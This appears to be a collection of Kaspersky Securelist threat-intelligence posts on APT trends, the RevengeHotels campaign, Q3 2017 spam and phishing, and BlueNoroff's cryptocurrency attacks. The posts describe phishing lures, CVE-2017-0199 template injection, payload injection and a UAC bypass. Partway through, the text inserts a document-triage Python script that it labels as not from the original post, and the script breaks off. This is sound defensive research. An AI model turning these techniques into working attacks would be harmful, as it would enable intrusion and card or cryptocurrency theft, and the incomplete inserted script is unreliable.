Our regular quarterly reviews are intended to highlight the key developments of APT groups.\n\nHere are the main trends that we've seen in Q3 2020:\n\n * Geo-politics continues to drive the development of many APT campaigns, as seen in recent months in the activities of Transparent Tribe, Sidewinder, Origami Elephant and MosaicRegressor, and in the 'naming and shaming' of various threat actors by the NCSC and the US Department of Justice.\n * Organizations in the financial sector also continue to attract attention: the activities of the mercenary group DeathStalker are a recent example.\n * We continue to observe the use of mobile implants in APT attacks with recent examples including Transparent Tribe and Origami Elephant.\n * While APT threat actors remain active across the globe, recent hotspots of activity have been Southeast Asia, the Middle East and various regions affected by the activities of Chinese-speaking APT groups.\n * Unsurprisingly, we continue to see COVID-19-themed attacks \u2013 this quarter they included WellMess and Sidewinder.\n * Among the most interesting APT campaigns this quarter were DeathStalker and MosaicRegressor: the former underlining the fact that APT groups can achieve their aims without developing highly sophisticated tools; the latter representing the leading edge in malware development.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. 
However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "cvss3": {}, "published": "2020-11-03T10:00:37", "type": "securelist", "title": "APT trends report Q3 2020", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-1182", "CVE-2019-13720", "CVE-2019-1458", "CVE-2020-0986", "CVE-2020-1380"], "modified": "2020-11-03T10:00:37", "id": "SECURELIST:E2805DD2729049C4BBE6F641B5ADA21C", "href": "https://securelist.com/apt-trends-report-q3-2020/99204/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-28T12:29:47", "description": "\n\nRevengeHotels is a targeted cybercrime malware campaign against hotels, hostels, hospitality and tourism companies, mainly, but not exclusively, located in Brazil. We have confirmed more than 20 hotels that are victims of the group, located in eight states in Brazil, but also in other countries such as Argentina, Bolivia, Chile, Costa Rica, France, Italy, Mexico, Portugal, Spain, Thailand and Turkey. The goal of the campaign is to capture credit card data from guests and travelers stored in hotel systems, as well as credit card data received from popular online travel agencies (OTAs) such as Booking.com.\n\nThe main attack vector is via email with crafted Word, Excel or PDF documents attached. Some of them exploit CVE-2017-0199, loading it using VBS and PowerShell scripts and then installing customized versions of **RevengeRAT, NjRAT, NanoCoreRAT, 888 RAT** and other custom malware such as **ProCC** in the victim's machine. The group has been active since 2015, but increased its attacks in 2019.\n\nIn our research, we were also able to track two groups targeting the hospitality sector, using separate but similar infrastructure, tools and techniques. 
PaloAlto has already [written](<https://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/>) about one of them. We named the first group **RevengeHotels**, and the second **ProCC**. These groups use a lot of social engineering in their attacks, asking for a quote from what appears to be a government entity or private company wanting to make a reservation for a large number of people. Their infrastructure also relies on the use of dynamic DNS services pointing to commercial hosting and self-hosted servers. They also sell credentials from the affected systems, allowing other cybercriminals to have remote access to hotel front desks infected by the campaign.\n\nWe monitored the activities of these groups and the new malware they are creating for over a year. With a high degree of confidence, we can confirm that at least two distinct groups are focused on attacking this sector; there is also a third group, though it is unclear if its focus is solely on this sector or if it carries out other types of attacks.\n\n## **Not the quotation you're expecting**\n\nOne of the tactics used in operations by these groups is highly targeted spear-phishing messages. They register typo-squatting domains, impersonating legitimate companies. The emails are well written, with an abundance of detail. They explain why the company has chosen to book that particular hotel. By checking the sender information, it's possible to determine whether the company actually exists. 
However, there is a small difference between the domain used to send the email and the real one.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/26094716/revengehotels-1.png>)\n\n_An email sent to a hotel supposedly from an attorney's office_\n\nThis spear-phishing message, written in Portuguese, has a malicious file attached misusing the name of a real attorney's office, while the sender domain of the message was registered one day before, using a typo-squatting domain. The group goes further in its social engineering effort: to convince the hotel personnel about the legitimacy of their request, a copy of the National Registry of Legal Entities card (CNPJ) is attached to the quotation.\n\nThe attached file, Reserva Advogados Associados.docx (Attorneys Associates Reservation.docx), is a malicious Word file that drops a remote OLE object via template injection to execute macro code. The macro code inside the remote OLE document contains PowerShell commands that download and execute the final payload.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/26094920/revengehotels-2.png>)\n\n_PowerShell commands executed by the embedded macro_\n\nIn the **RevengeHotels** campaign, the downloaded files are .NET binaries protected with the Yoda Obfuscator. After unpacking them, the code is recognizable as the commercial RAT RevengeRAT. An additional module written by the group called ScreenBooking is used to capture credit card data. It monitors whether the user is browsing a specific web page. In the initial versions, back in 2016, the downloaded files from RevengeHotels campaigns were divided into two modules: a backdoor and a module to capture screenshots. 
Recently we noticed that these modules had been merged into a single backdoor module **able to collect data from clipboard and capture screenshots**.\n\nIn this example, the webpage that the attacker is monitoring is booking.com (more specifically, the page containing the card details). The code is specifically looking for data in Portuguese and English, allowing the attackers to steal credit card data from web pages written in these languages.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/26095114/revengehotels-3.png>)\n\n_Title searched by the malware in order to capture the screen contents_\n\nIn the **ProCC** campaigns, the downloaded files are Delphi binaries. The backdoor installed in the machine is more customized than that used by RevengeHotels: it's developed from scratch and is able to **collect data from the clipboard and printer spooler, and capture screenshots**. Because the personnel in charge of confirming reservations usually need to pull credit card data from OTA websites, it's possible to collect card numbers by monitoring the clipboard and the documents sent to the printer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/26094643/revengehotels-4.png>)\n\n_Screenshot is captured when the user copies something to the clipboard or makes a print request_\n\n## **A bad guy's concierge**\n\nAccording to the relevant underground forums and messaging groups, these criminals also infect front desk machines in order to capture credentials from the hotel administration software; they can then steal credit card details from it too. 
Some criminals also sell remote access to these systems, acting as a concierge for other cybercriminals by giving them permanent access to steal new data by themselves.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/26095337/revengehotels-5.png>)\n\n_Access to hotel booking systems containing credit card details is sold by criminals as a service_\n\nSome Brazilian criminals tout credit card data extracted from a hotel's system as high quality and reliable because it was extracted from a trusted source, i.e., a hotel administration system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/26100225/revengehotels-6.png>)\n\n_Message sent to an underground channel selling data extracted from hotel systems_\n\n## **Guests and victims**\n\nThe majority of the victims are associated with the hospitality sector. Based on the routines used, we estimate that this attack has a global reach. However, based on our telemetry data, we can only confirm victims in the following countries:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/26095113/revengehotels-7.png>)\n\n_Victims confirmed in Argentina, Bolivia, Brazil, Chile, Costa Rica, France, Italy, Mexico, Portugal, Spain, Thailand and Turkey_\n\nBased on data extracted from Bit.ly statistics, we can see that potential victims from many other countries have at least accessed the malicious link. This data suggests that the number of countries with potential victims is higher than our telemetry has registered.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/26095131/revengehotels-8.png>)\n\n_Victims per country based on data from a malicious Bit.ly link from the RevengeHotels campaign_\n\n## **A safe stay**\n\nRevengeHotels is a campaign that has been active since at least 2015, revealing different groups using traditional RAT malware to infect businesses in the hospitality sector. 
While there is a marked interest in Brazilian victims, our telemetry shows that their reach has extended to other countries in Latin America and beyond.\n\nThe use of spear-phishing emails, malicious documents and RAT malware is yielding significant results for at least two groups we have identified in this campaign. Other threat actors may also be part of this wave of attacks, though there is no confirmation at the current time.\n\nIf you want to be a savvy and safe traveler, it's highly recommended to use a virtual payment card for reservations made via OTAs, as these cards normally expire after one charge. While paying for your reservation or checking out at a hotel, it's a good idea to use a virtual wallet such as Apple Pay, Google Pay, etc. If this is not possible, use a secondary or less important credit card, as you never know if the system at the hotel is clean, even if the rooms are\u2026\n\nAll Kaspersky products detect this threat as: \n \n * HEUR:Backdoor.MSIL.Revenge.gen\n * HEUR:Trojan-Downloader.MSIL.RevengeHotels.gen\n * HEUR:Trojan.MSIL.RevengeHotels.gen\n * HEUR:Trojan.Win32.RevengeHotels.gen\n * HEUR:Trojan.Script.RevengeHotels.gen \n \n## **Indicators of compromise (IoCs)**\n\n#### **Reference hashes:**\n\nFor a full list of IoCs as well as the YARA rules and intelligence report for this campaign, please visit the Kaspersky Threat Intelligence Portal: <https://tip.kaspersky.com/>", "cvss3": {}, "published": "2019-11-28T10:00:48", "type": "securelist", "title": "RevengeHotels: cybercrime targeting hotel front desks worldwide", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199"], "modified": "2019-11-28T10:00:48", "id": "SECURELIST:ADE333FF4D3F96FCD027E6BB825FFD9B", "href": "https://securelist.com/revengehotels/95229/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-11-03T11:33:34", "description": "\n\n## Quarterly highlights\n\n### Blockchain and spam\n\nCryptocurrencies have been a regular theme in the media for several years now. Financial analysts predict a great future for them, various governments are thinking about launching their own currencies, and graphics cards are swept off the shelves as soon as they go on sale. Of course, spammers could not resist the topics of cryptocurrency, mining and blockchain technology.\n\nLast quarter we wrote that many Trojans were downloading 'miners' as a payload on victims' computers, and in the third quarter of 2017 this practice became even more widespread.\n\n#### Fraud, cryptocurrencies and binary options\n\nFinancial fraud makes very active use of the cryptocurrency topic: users receive messages that vividly describe the use of special software for trading on the cryptocurrency market and how it can secure their financial future.\n\n[](<https://securelist.com/files/2017/10/171026-spam-report-q317-1.png>)\n\n_Examples of emails with offers \"to secure your financial future\"_\n\nAfter clicking on a link, users end up on a site where they are once again persuaded to join the ranks of the rich who only have one problem in life \u2013 how to spend their money. In reality, such sites are partners of shady brokerage houses, and purveyors of new, inexperienced customers. It is there that new users are redirected.\n\nThe plan is to get the victim to deposit a certain amount to their account, usually several hundred dollars, for the opportunity to start trading. We should note here that we're no longer talking about cryptocurrencies \u2013 in most cases, trading involves binary options.\n\nThe problem is not so much the questionable legality of the trading itself as the fact that no one guarantees the honesty of the brokerage houses and, consequently, there is no guarantee that the invested funds will be returned. 
The fraudsters start by motivating people to invest more and more money, and then simply disappear, leaving the victim to read angry reviews on the Internet from other cheated depositors.\n\nThere are also more primitive types of fraud, where the email directly asks the recipient to transfer bitcoins to a specific wallet, with a promise to return the investment with interest five days later. But only the most na\u00efve recipients are likely to fall for such an offer.\n\n[](<https://securelist.com/files/2017/10/171026-spam-report-q317-2-5.png>)\n\n_Naive users are invited to \"invest\" bitcoins for a short time at a high rate of interest_\n\n#### Webcasts\n\nAnother example of the cryptocurrency theme being used in spam is that of webcasts. In most cases, scammers suggest taking a study course that will help the user understand more about cryptocurrencies and how to invest in them. Of course, the sums invested in \"training\" will result in huge profits in the near future, according to the organizers.\n\n[](<https://securelist.com/files/2017/10/171026-spam-report-q317-3.png>)\n\n### Natural disasters and the 'White House administration'\n\nIn August and September, the world's attention was focused on hurricanes Irma and Harvey, and the earthquake in Mexico. There were dozens of victims of these disasters, and the damage caused was estimated to be billions of dollars. These tragic events inevitably attracted the attention of so-called Nigerian scammers trying to cash in on people's grief. They sent messages on behalf of family members whose relatives died during the hurricanes and asked for help obtaining an inheritance left by them. Natural disasters were also mentioned in emails promoting job offers and loans.\n\n[](<https://securelist.com/files/2017/10/171026-spam-report-q317-4.png>)\n\nIn the third quarter, 'Nigerian' letters also mentioned the name of Donald Trump, the current US president. 
The authors pretended to be representatives of state or banking organizations, and to make their message sound more important they claimed they were appointed by the US president or were acting on his behalf. The spammers spun the standard tales in their fraudulent letters, promising millions of dollars to users, with the scammers asking for personal information so that they could supposedly track the money transfer. The letters contained identical text but with different layouts and contact details.\n\n[](<https://securelist.com/files/2017/10/171026-spam-report-q317-5.png>)\n\n_Letters 'from the US president's office'_\n\n### B2B fakes in malicious emails\n\nThere is still a tendency to create emails with malicious attachments for fake commercial offers. At times their quality is so good that you suspect they could be a man-in-the-middle attack.\n\n[](<https://securelist.com/files/2017/10/171026-spam-report-q317-6.png>)\n\n_The file in the attachment is detected as HEUR:Trojan.Java.Agent.gen. This malware adds itself to startup and tries to close programs such as Process Hacker, system explorer and security software processes. It then communicates with the remote server and waits for the command to install other malicious programs_\n\n[](<https://securelist.com/files/2017/10/171026-spam-report-q317-7.png>)\n\n_The attachment is detected as HEUR:Exploit.MSOffice.Generic, exploiting the vulnerability CVE-2017-0199 in MS Word. As a result, other malicious programs are downloaded to the victim's computer_\n\n[](<https://securelist.com/files/2017/10/171026-spam-report-q317-8.png>)\n\n_Both archives contain the same malicious object, detected as Trojan.Win32.VBKrypt.xtgt. It collects information from the victim's computer and transfers it to the remote server_\n\n### Release of new iPhone\n\nIn September, Apple unveiled the new models of its smartphone \u2013 iPhone 8 and iPhone X. 
This event was widely covered in the media, and spammers weren't going to miss out.\n\n[](<https://securelist.com/files/2017/10/171026-spam-report-q317-0.png>)\n\nEven before the official presentation, we began to record spam mailings with offers to test the updated phone for free and participate in a prize draw to win one. Some mailings even reported the recipient had won a device before it was publicly unveiled. In most cases, the links in these emails could end up downloading Reimage Repair 'advertising software'. Immediately after the release of the smartphone, Chinese factories got in on the act, sending out emails advertising various accessories for the new model. Our traps also recorded a large volume of phishing associated with the purchase and delivery of the popular gadget.\n\n## Statistics\n\n### Proportion of spam in email traffic\n\n[](<https://securelist.com/files/2017/10/Spam_world_EN.png>)\n\n_Percentage of spam in global email traffic, Q2 and Q3 2017_\n\nIn the third quarter of 2017, the largest share of spam was recorded in September \u2013 59.56%. The average share of spam in global email traffic was 58.02%, which was almost 1.05 p.p. more than the average for the previous quarter.\n\n### Sources of spam by country\n\n[](<https://securelist.com/files/2017/10/Countries_sources_of_spam_EN.png>)\n\n_Sources of spam by country, Q3 2017_\n\nAccording to the results for the third quarter of 2017, China (12.24%) became the biggest source of spam, after finishing third the previous quarter. Last quarter's leader Vietnam (11.17%) was second after a decrease of 1.2 p.p. The US fell one place to third (9.62%), while India (8.49%) remained fourth in this rating. Iran rounded off the top 10, accounting for 2.07% of all spam.\n\n### Spam email size\n\n[](<https://securelist.com/files/2017/10/Spam_email_size_Q3_2017_EN.png>)\n\n_Breakdown of spam emails by size, Q2 and Q3 2017_\n\nThe share of very small emails (up to 2 KB) in spam increased by 9.46 p.p. 
to 46.87% in the third quarter. The proportion of emails between 5 and 10 KB in size also increased by 6.66 p.p. compared with the previous quarter and amounted to 12.6%.\n\nThe number of emails between 10 and 20 KB decreased, however, with their share falling by 7 p.p. There was also a decrease in emails sized 20 to 50 KB. Their share this quarter amounted to 19%, which was a fall of 8.16 p.p. compared to the previous reporting period.\n\nOverall, the number of very small emails continues to grow.\n\n### Malicious attachments in email\n\n#### Top 10 malware families\n\n[](<https://securelist.com/files/2017/10/TOP10_families_Q3_2017.png>)\n\n_TOP 10 malware families in Q3 2017_\n\nBackdoor.Java.QRat (3.11%) became the most widespread malicious program family in email traffic. Next came the Trojan-Downloader.VBS.Agent family (2.95%), followed by Trojan-Downloader.JS.SLoad (2.94%). The newcomers in this rating \u2013 Trojan.Win32.VBKrypt and Trojan-Downloader.VBS.SLoad (a VBS script that downloads and launches other malicious programs on the victim machine, usually ransomware encryptors) \u2013 occupy fifth and eighth places with 2.64% and 2.02% respectively. The Trojan.PDF.Badur family (1.79%) rounds off the top 10.\n\n### Countries targeted by malicious mailshots\n\n[](<https://securelist.com/files/2017/10/Countries_targets_EN.png>)\n\n_Distribution of email antivirus verdicts by country, Q3 2017_\n\nGermany remained the country targeted most by malicious mailshots in the third quarter of 2017. Its share increased by 6.67 p.p. and amounted to 19.38%.\n\nChina came second, with 10.62% of mail antivirus verdicts recorded there \u2013 a drop of 1.47 p.p. compared to Q2. Russia, which came fifth the previous quarter, completed the top three (9.97%) after its share increased by 4.3 p.p. 
Fourth and fifth were occupied by Japan (5.44%) and Italy (3.90%) respectively.\n\n## Phishing\n\nIn the third quarter of 2017, the anti-phishing system prevented 59,569,508 attempted visits to phishing pages on the computers of Kaspersky Lab users. Overall, 9.49% of unique users of Kaspersky Lab products worldwide were attacked by phishers in Q3 2017.\n\n### Geography of attacks\n\nThe country with the largest percentage of users affected by phishing attacks was once again Brazil (19.95%, +1.86 p.p.).\n\n[](<https://securelist.com/files/2017/10/Q3_Phishing_map.png>)\n\n_Geography of phishing attacks*, Q3 2017 \n* Number of users on whose computers the Anti-Phishing system was triggered as a percentage of the total number of Kaspersky Lab users in that country_\n\nAustralia (16.51%) came second after its share increased by 3.81 p.p. In third place was New Zealand (15.61%, +3.55 p.p.). China (12.66%) fell from second place to fourth, with its share losing 0.19 p.p. Next came France (12.42%), Peru (11.73%), Argentina (11.43%), Canada (11.14%), Qatar (10.51%) and Georgia (10.34%).\n\n**Country** | **% of users attacked** \n---|--- \nBrazil | 19.95% \nAustralia | 16.51% \nNew Zealand | 15.61% \nChina | 12.66% \nFrance | 12.42% \nPeru | 11.73% \nArgentina | 11.43% \nCanada | 11.14% \nQatar | 10.51% \nGeorgia | 10.34% \n \n**TOP 10 countries by percentage of users attacked**\n\n### Organizations under attack\n\n#### Rating the categories of organizations attacked by phishers\n\nThe rating of attacks by phishers on different categories of organizations is based on detections of Kaspersky Lab's heuristic anti-phishing component. It is activated every time a user attempts to open a phishing page while information about it has not yet been included in Kaspersky Lab's databases. It does not matter how the user attempts to open the page \u2013 by clicking a link in a phishing email or in a message on a social network or, for example, as a result of malware activity. 
After the security system is activated, a banner is displayed in the browser warning the user about a potential threat.\n\nIn the third quarter of 2017, almost half (47.54%) of the detections by the heuristic anti-phishing component were recorded on pages referencing brands from financial categories such as Banks (24.1%, +0.61 p.p.), Payment systems (13.94%, -4.46 p.p.) and Online stores (9.49%, -0.08 p.p.).\n\n[](<https://securelist.com/files/2017/10/Q3_Phishing_Organizations_EN.png>)\n\n_Distribution of organizations affected by phishing attacks by category, Q3 2017_\n\n### Hot topics this quarter\n\n#### Airline tickets\n\nLast quarter we described a scam involving a [free giveaway of airline tickets](<https://securelist.com/two-tickets-as-bait/78686/>) supposedly by popular airlines, with information being spread via reposts from victims on a social network. In the third quarter, scammers continued to spread the 'giveaway' using WhatsApp instead. Judging by the decrease in the number of anti-phishing verdicts in the Airlines category, however, we can assume that this approach wasn't as effective.\n\n[](<https://securelist.com/files/2017/10/171026-spam-report-q317-2.png>)\n\nThe downturn may also be due to the fact that scammers switched to 'prize draws' not only for air tickets but also other prizes, for example, sports shoes, cinema tickets, gift cards for Starbucks, etc.\n\n[](<https://securelist.com/files/2017/10/171026-spam-report-q317-16.png>)\n\nBefore you could claim your prize you had to share information about the prize draw with eight contacts on WhatsApp.\n\n[](<https://securelist.com/files/2017/10/171026-spam-report-q317-17.png>)\n\nAfter clicking the button, users are redirected to WhatsApp.\n\n[](<https://securelist.com/files/2017/10/171026-spam-report-q317-18.png>)\n\n_The redirect function in the instant messenger and the message that has to be sent to 
contacts_\n\n[](<https://securelist.com/files/2017/10/171026-spam-report-q317-19.png>)\n\n_This is what the message looks like in the app_\n\n[](<https://securelist.com/files/2017/10/171026-spam-report-q317-20.png>)\n\n_The message needs to be sent a minimum of eight times_\n\nAfter sending the message to their contacts the victim, instead of winning a prize, is redirected to some dubious resource, for example, a page where malicious extensions are installed, a new survey, etc.\n\n#### WhatsApp\n\nWhatsApp users are also subjected to phishing attacks that hide behind the app brand.\n\n[](<https://securelist.com/files/2017/10/171026-spam-report-q317-21.png>)\n\nMore often than not the scammers try to steal money on the pretext of updating the application or paying for a subscription. At one time WhatsApp really did request a subscription payment, although now it's free.\n\n[](<https://securelist.com/files/2017/10/171026-spam-report-q317-22.png>)\n\nScammers offer a choice of subscription \u2013 for one year, three years or five. However, victims will lose much more than the stated amount if they enter their bank card details on such a site.\n\n[](<https://securelist.com/files/2017/10/171026-spam-report-q317-23.png>)\n\n#### Netflix\n\nNetflix users are another popular target of phishers. The number of attacks on them increased in the third quarter. The criminals usually coax bank card details from users on the pretext of a failed payment or other problems linked to subscription renewal.\n\n[](<https://securelist.com/files/2017/10/171026-spam-report-q317-24.png>)\n\n#### Green Card\n\nOn the eve of the Green Card lottery conducted by the US government in October-November of each year, we are seeing a surge in activity by scammers offering help to apply.\n\n[](<https://securelist.com/files/2017/10/171026-spam-report-q317-25.png>)\n\nAfter completing the form on the fraudulent site, the user is asked to pay for their application. 
If the victim enters their bank card details, far more money than the amount indicated on the site can end up being withdrawn from their account.

#### Rap battle

Even niche events can be good cover for phishing activity. On 15 October, a rap battle was held between Russian artist Oxxxymiron and Dizaster, one of the best battle MCs in the US. This followed another battle that took place just a few months earlier between Oxxxymiron and Slava KPSS. Less than 12 hours later a video of the event had gained around 5 million views, and it wasn't just thematic sites writing about the battle but also a lot of the mainstream Russian media.

Shortly before the publication of the official video, phishing web pages dedicated to the event began to appear online:

[](<https://securelist.com/files/2017/10/171026-spam-report-q317-27.png>)

If a user tried to view the video, they were prompted to first sign in to the popular Russian social network VKontakte.

[](<https://securelist.com/files/2017/10/171026-spam-report-q317-28.png>)

After entering their login and password, the victim was redirected to the official page of the Versus site on the social network, while their credentials went to the scammers.

### TOP 3 attacked organizations

Fraudsters continue to focus most of their attention on the most popular brands, enhancing their chances of a successful phishing attack. More than half of all detections by Kaspersky Lab's heuristic anti-phishing component are for phishing pages hiding behind the names of fewer than 15 companies. At the same time, the composition of the top three has remained unchanged for several quarters:

**Organization** | **% of detected phishing links**
---|---
Facebook | 7.96
Microsoft Corporation | 7.79
Yahoo! | 4.79

## Conclusion

In terms of the average share of spam in global email traffic (58.02%), the third quarter of 2017 was almost identical to the previous reporting period: once again growth was slightly more than one percentage point, 1.05 p.p. (compared with 1.07 p.p. in Q2 2017). As in previous quarters, spammers were quick to react to high-profile events and adapted their fraudulent emails to the news agenda. This quarter they were quick to use the theme of natural disasters following hurricanes Irma and Harvey and the earthquake in Mexico. The popular theme of cryptocurrency was also exploited: trusting victims were offered seminars and 'help' with trading that came with guaranteed profits.

Scammers continued to use all available communication channels to spread phishing content, including social networks and instant messengers: in the current quarter, the anti-phishing component prevented more than 59 million attempts to redirect to phishing pages, 13 million more than in Q2.

The most common malware family in the third quarter of 2017 was Backdoor.Java.QRat (3.11%), followed by Trojan-Downloader.VBS.Agent (2.95%) and Trojan-Downloader.JS.SLoad (2.94%).

Published: 2017-11-03 | Title: Spam and phishing in Q3 2017 | https://securelist.com/spam-and-phishing-in-q3-2017/82901/ | ID: SECURELIST:6C418779587ADE032AB673F44440002B | CVEs referenced: CVE-2017-0199

Last seen: 2022-01-21

BlueNoroff is the name of an APT group coined by Kaspersky researchers while investigating the notorious attack on Bangladesh's Central Bank back in 2016. It is a mysterious group with links to Lazarus and a financial motivation that is unusual for an APT. 
The group seems to work more like a unit within a larger formation of Lazarus attackers, with the ability to tap into its vast resources: be it malware implants, exploits, or infrastructure. See our [earlier publication](<https://securelist.com/lazarus-under-the-hood/77908/>) about BlueNoroff attacks on the banking sector.

We have also [previously reported](<https://securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus/90019/>) on cryptocurrency-focused BlueNoroff attacks. It appears that BlueNoroff has shifted its focus from banks and SWIFT-connected servers to cryptocurrency businesses as the main source of the group's illegal income. These attackers even took the long route of building fake cryptocurrency software development companies in order to trick their victims into installing legitimate-looking applications that eventually receive backdoored updates. [We reported](<https://securelist.com/operation-applejeus/87553/>) on the first variant of such software back in 2018, but there were many other samples to be found, which [were later reported](<https://us-cert.cisa.gov/ncas/alerts/aa21-048a>) by the US CISA (Cybersecurity and Infrastructure Security Agency) in 2021.

The group is currently active (recent activity was spotted in November 2021).

## BlueNoroff's latest infection vector

If there's one thing BlueNoroff has been very good at, it's the abuse of trust. Be it an internal bank server communicating with SWIFT infrastructure to issue fraudulent transactions, cryptocurrency exchange software installing an update with a backdoor to compromise its own users, or other means. Throughout its SnatchCrypto campaign, BlueNoroff abused trust in business communications: both internal chats between colleagues and interaction with external entities.

According to our research this year, we have seen BlueNoroff operators stalking and studying successful cryptocurrency startups. 
The goal of the infiltration team is to build a map of interactions between individuals and understand possible topics of interest. This lets them mount high-quality social engineering attacks that look like totally normal interactions. A document sent from one colleague to another on a topic, which is currently being discussed, is unlikely to trigger any suspicion. BlueNoroff compromises companies through precise identification of the necessary people and the topics they are discussing at a given time.\n\nIn a simple scenario, it can appear as a notification of a shared document via Google Drive from one colleague/friend to another:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113131/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_01.png>)\n\nNote the tiny "X" image - it's an icon for an image that failed to load. We opened the email on an offline system; if the system had been connected to the internet, there would be a real icon for a Google document loaded from a third-party tracking server that immediately notifies the attacker that the target opened the email.\n\nBut we also observed a slightly more elaborate approach of an email being forwarded from one colleague to another. This works even better for the attacker, because the original email and the attachment appear to have already been checked by the forwarding party. Ultimately, it elevates the level of trust sufficiently for the document to be opened.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113157/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_02.png>)\n\nWe haven't shown the forwarder address as it belongs to an attacked user, but note there is a piece of text that reads "via sendgrid.net". There is no website at sendgrid.net, but it can be a domain owned by a US-based company called [Sendgrid](<https://sendgrid.com/>), that specializes in email distribution, and email marketing campaigns. 
According to its website, it offers rich user-tracking capabilities and claims to send 90 billion emails every month. It appears to be a legitimate and reputable business, which is probably why Gmail accepts MIME header customization (or, in the case of an attack, sender address forgery) with nothing more than the short remark "via sendgrid.net". We informed Sendgrid of this activity. Of course, many users could easily overlook the remark or simply not know what it means. The person whose name was abused here appears, according to public information, to be in the top management of the Digital Currency Group (dcg.co). To be clear, we believe that neither the employee nor the company has anything to do with this attack or the email.

Which other company names have they abused? There are many. We have compiled a list of names and logos so you can watch out for them in your inbox.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113227/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_03.png>)

**_The companies whose logos are displayed here were chosen by BlueNoroff for impersonation in social engineering tricks. Note that this is no proof that the companies listed were compromised._**

If you recognize them in incoming communication, there's no reason to panic, but proceed with caution. For example, open incoming documents in a sandboxed or virtualized offline environment, convert the document to a different format, or use a non-standard viewer (e.g. a server-side document viewer such as Google Docs, Collabora Online, ONLYOFFICE or Microsoft Office Online).

In some cases, we saw what looked like the compromise of an existing registered company and the subsequent use of its resources such as social media accounts, messengers and email to initiate business interaction with the target. 
If a venture capital company approaches a startup and sends files that look like an investment contract or some other promising documents, the startup won't hesitate to open them, even if some risk is involved and Microsoft Office adds warning messages.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12135443/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_04.png>)

A compromised LinkedIn account of an actual company representative was used to approach a target and engage with them. The true company's website is different from the one referenced in the conversation. By manipulating trust in this way, BlueNoroff doesn't even need to burn valuable 0-days. Instead, they can rely on regular macro-enabled documents or older exploits.

We found they generally stick to CVE-2017-0199, using it again and again before trying something else. The vulnerability initially allowed automatic execution of a remote script linked to a weaponized document. The exploit relies on fetching remote content via an embedded URL inside one of the document's metadata files. An attentive user may even spot that something fishy is happening when MS Word shows a standard loading popup window.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113440/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_05.png>)

If the document is opened offline or the remote content is blocked, it presents some legitimate content, likely scraped or stolen from another party.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113508/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_06.png>)

If the document isn't blocked from connecting to the internet, it fetches a remote template that is another macro-enabled document. The two documents are like two ingredients of an explosive that only produce a blast when mixed together. The first one contains two base64-encoded binary objects (one each for 32-bit and 64-bit Windows) declared as image data. The second document (the remote template) contains a VBA macro that extracts one of these objects, spawns a new process (notepad.exe) and injects and executes the binary code in it. Although the binary objects have JPEG headers, they are actually just PE files with modified headers.

Interestingly, BlueNoroff shows improved opsec at this stage. The VBA macro does a cleanup by removing the binary objects and the reference to the remote template from the original document and saving it to the same file. This essentially de-weaponizes the document, leaving investigators scratching their heads during analysis.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113540/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_07.png>)

Additionally, we've seen that this actor utilized an elevation of privilege (EoP) technique in the initial infection stage. According to our telemetry, the _word.exe_ process, created by opening the malicious document, spawned the legitimate process _dccw.exe_. _dccw.exe_ is a Windows system file that has the auto-elevate property. Abusing _dccw.exe_ is a known [technique](<https://github.com/L3cr0f/DccwBypassUAC>) and we suspect the malware authors used it to run the next stage malware with high privileges. In another case, we observed _word.exe_ spawning a _notepad.exe_ that received a malware injection and in turn spawned _mmc.exe_. Unfortunately, the full details of this technique are unavailable due to some missing parts.

## Malware infection

We assess that the BlueNoroff group's interest in cryptocurrency theft started with the SnatchCrypto campaign, which has been running since at least 2017. While tracking this campaign, we've seen several full infection chains deliver malware. For the initial infection vector, they usually utilized zipped Windows shortcut files or weaponized Word documents. 
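Before going through the individual chains, here is an added triage script for the remote-template documents described in the previous section. It is not code from the original post: it opens a .docx as the zip it is, flags an attachedTemplate relationship with an external target (the CVE-2017-0199-style hook), and decodes long base64 runs looking for a PE signature hiding behind image data. The sample document, its template URL and the image part are constructed for the example.

```python
"""Triage script for the remote-template documents described above.

Added example, not code from the original post. A .docx is a zip; Word pulls a
remote template when word/_rels/settings.xml.rels carries an attachedTemplate
relationship with TargetMode="External", which is the hook this chain uses.
The second check decodes long base64 runs and looks for a PE image inside,
matching the 'image data that is really a PE file' trick. The sample document,
its template URL and the image part are all constructed here.
"""
import base64
import io
import re
import zipfile

ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
REL_RE = re.compile(r"<Relationship\b[^>]*>")
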